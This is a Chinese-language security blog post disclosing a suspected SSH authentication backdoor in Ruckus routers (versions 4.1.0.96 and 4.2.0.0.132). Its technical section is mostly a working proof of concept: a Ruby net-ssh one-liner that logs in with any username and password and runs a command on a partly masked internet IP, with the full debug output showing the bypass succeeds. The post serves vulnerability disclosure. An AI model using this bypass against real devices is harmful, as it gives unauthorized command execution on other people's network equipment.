优科路由器(Ruckus Router)疑似后门分析
waynewong 3249天前一,概要
近期,白帽汇安全团队在分析netscreen后门的过程中,无意中发现优科路由器(Ruckus Router)某版本也存在疑似后门行为,在没有账号的情况下可以直接执行命令,目前已经探测出互联网至少数百台设备受影响。
已经发现受影响的版本包括4.1.0.96和4.2.0.0.132,暂时我们还不太确定是否属于已知问题。
二,技术分析
正常情况下通过ssh连接服务器,会要求输入用户名和密码,比如:
$ ssh 8.40.x.x
Please login: admin
password :
Login incorrect
Please login:
我们利用ruby环境下的net-ssh执行ssh协议,打印调试信息:
$ irb
2.1.5 :233 > require 'net/ssh'
2.1.5 :233 > Net::SSH.start('8.40.x.x', 'any', :password => %q|anychar|,:verbose=>:debug,:auth_methods => ["password"]) do |ssh|; puts ssh.exec!("get version"); end
D, [2015-12-24T13:36:52.577626 #6230] DEBUG -- net.ssh.transport.session[3fc639464fa8]: establishing connection to 8.40.x.x:22
D, [2015-12-24T13:36:52.935203 #6230] DEBUG -- net.ssh.transport.session[3fc639464fa8]: connection established
I, [2015-12-24T13:36:52.935285 #6230] INFO -- net.ssh.transport.server_version[3fc6390b5ba0]: negotiating protocol version
D, [2015-12-24T13:36:53.342534 #6230] DEBUG -- net.ssh.transport.server_version[3fc6390b5ba0]: remote is `SSH-2.0-dropbear_0.48'
D, [2015-12-24T13:36:53.342590 #6230] DEBUG -- net.ssh.transport.server_version[3fc6390b5ba0]: local is `SSH-2.0-Ruby/Net::SSH_3.0.1 x86_64-darwin14.0'
D, [2015-12-24T13:36:53.756625 #6230] DEBUG -- socket[3fc6394645f8]: read 344 bytes
D, [2015-12-24T13:36:53.756732 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 0 type 20 len 340
I, [2015-12-24T13:36:53.756796 #6230] INFO -- net.ssh.transport.algorithms[3fc6390b4598]: got KEXINIT from server
I, [2015-12-24T13:36:53.756848 #6230] INFO -- net.ssh.transport.algorithms[3fc6390b4598]: sending KEXINIT
D, [2015-12-24T13:36:53.757020 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 0 type 20 len 1684
D, [2015-12-24T13:36:53.757140 #6230] DEBUG -- socket[3fc6394645f8]: sent 1688 bytes
I, [2015-12-24T13:36:53.757176 #6230] INFO -- net.ssh.transport.algorithms[3fc6390b4598]: negotiating algorithms
D, [2015-12-24T13:36:53.757274 #6230] DEBUG -- net.ssh.transport.algorithms[3fc6390b4598]: negotiated:
* kex: diffie-hellman-group1-sha1
* host_key: ssh-rsa
* encryption_server: aes128-cbc
* encryption_client: aes128-cbc
* hmac_client: hmac-sha1
* hmac_server: hmac-sha1
* compression_client: none
* compression_server: none
* language_client:
* language_server:
D, [2015-12-24T13:36:53.757299 #6230] DEBUG -- net.ssh.transport.algorithms[3fc6390b4598]: exchanging keys
D, [2015-12-24T13:36:53.757886 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 1 type 30 len 140
D, [2015-12-24T13:36:53.757930 #6230] DEBUG -- socket[3fc6394645f8]: sent 144 bytes
D, [2015-12-24T13:36:57.345886 #6230] DEBUG -- socket[3fc6394645f8]: read 720 bytes
D, [2015-12-24T13:36:57.346065 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 1 type 31 len 700
D, [2015-12-24T13:36:57.415697 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 2 type 21 len 20
D, [2015-12-24T13:36:57.415823 #6230] DEBUG -- socket[3fc6394645f8]: sent 24 bytes
D, [2015-12-24T13:36:57.416003 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 2 type 21 len 12
D, [2015-12-24T13:36:57.416275 #6230] DEBUG -- net.ssh.authentication.session[3fc6388b4078]: beginning authentication of `any'
D, [2015-12-24T13:36:57.416374 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 3 type 5 len 28
D, [2015-12-24T13:36:57.416431 #6230] DEBUG -- socket[3fc6394645f8]: sent 52 bytes
D, [2015-12-24T13:36:58.155451 #6230] DEBUG -- socket[3fc6394645f8]: read 52 bytes
D, [2015-12-24T13:36:58.155590 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 3 type 6 len 28
D, [2015-12-24T13:36:58.155742 #6230] DEBUG -- net.ssh.authentication.session[3fc6388b4078]: trying password
D, [2015-12-24T13:36:58.155889 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 4 type 50 len 60
D, [2015-12-24T13:36:58.155950 #6230] DEBUG -- socket[3fc6394645f8]: sent 84 bytes
D, [2015-12-24T13:36:58.490987 #6230] DEBUG -- socket[3fc6394645f8]: read 36 bytes
D, [2015-12-24T13:36:58.491177 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 4 type 52 len 12
D, [2015-12-24T13:36:58.491277 #6230] DEBUG -- net.ssh.authentication.methods.password[3fc6388b3ee8]: password succeeded
D, [2015-12-24T13:36:58.491429 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 5 type 90 len 44
D, [2015-12-24T13:36:58.491552 #6230] DEBUG -- socket[3fc6394645f8]: sent 68 bytes
D, [2015-12-24T13:36:58.876109 #6230] DEBUG -- socket[3fc6394645f8]: read 52 bytes
D, [2015-12-24T13:36:58.876301 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 5 type 91 len 28
I, [2015-12-24T13:36:58.876449 #6230] INFO -- net.ssh.connection.session[3fc6388b29a8]: channel_open_confirmation: 0 0 8000 8000
I, [2015-12-24T13:36:58.876648 #6230] INFO -- net.ssh.connection.channel[3fc6388b2840]: sending channel request "env"
D, [2015-12-24T13:36:58.876769 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 6 type 98 len 44
I, [2015-12-24T13:36:58.876924 #6230] INFO -- net.ssh.connection.channel[3fc6388b2840]: sending channel request "exec"
D, [2015-12-24T13:36:58.877018 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 7 type 98 len 44
D, [2015-12-24T13:36:58.877221 #6230] DEBUG -- socket[3fc6394645f8]: sent 136 bytes
D, [2015-12-24T13:36:59.291831 #6230] DEBUG -- socket[3fc6394645f8]: read 36 bytes
D, [2015-12-24T13:36:59.292027 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 6 type 99 len 12
I, [2015-12-24T13:36:59.292122 #6230] INFO -- net.ssh.connection.session[3fc6388b29a8]: channel_success: 0
D, [2015-12-24T13:36:59.296051 #6230] DEBUG -- socket[3fc6394645f8]: read 84 bytes
D, [2015-12-24T13:36:59.296180 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 7 type 94 len 60
I, [2015-12-24T13:36:59.296248 #6230] INFO -- net.ssh.connection.session[3fc6388b29a8]: channel_data: 0 35b
D, [2015-12-24T13:36:59.691776 #6230] DEBUG -- socket[3fc6394645f8]: read 140 bytes
D, [2015-12-24T13:36:59.691968 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 8 type 96 len 12
I, [2015-12-24T13:36:59.692040 #6230] INFO -- net.ssh.connection.session[3fc6388b29a8]: channel_eof: 0
D, [2015-12-24T13:36:59.692225 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 9 type 98 len 44
I, [2015-12-24T13:36:59.692342 #6230] INFO -- net.ssh.connection.session[3fc6388b29a8]: channel_request: 0 exit-status false
D, [2015-12-24T13:36:59.692477 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 10 type 97 len 12
I, [2015-12-24T13:36:59.692523 #6230] INFO -- net.ssh.connection.session[3fc6388b29a8]: channel_close: 0
D, [2015-12-24T13:36:59.692613 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 8 type 97 len 28
Ruckus Router
Version: 4.2.0.0.132
I, [2015-12-24T13:36:59.692674 #6230] INFO -- net.ssh.connection.session[3fc6388b29a8]: closing remaining channels (0 open)
=> nil
2.1.5 :234 >
在上面的测试代码中,我们可以看到,设定了任意的用户名和任意的密码,再带上我们要执行的命令(这里是get version),我们就能够绕过登陆验证而直接执行命令。
评论正在提交,请稍等...
最新评论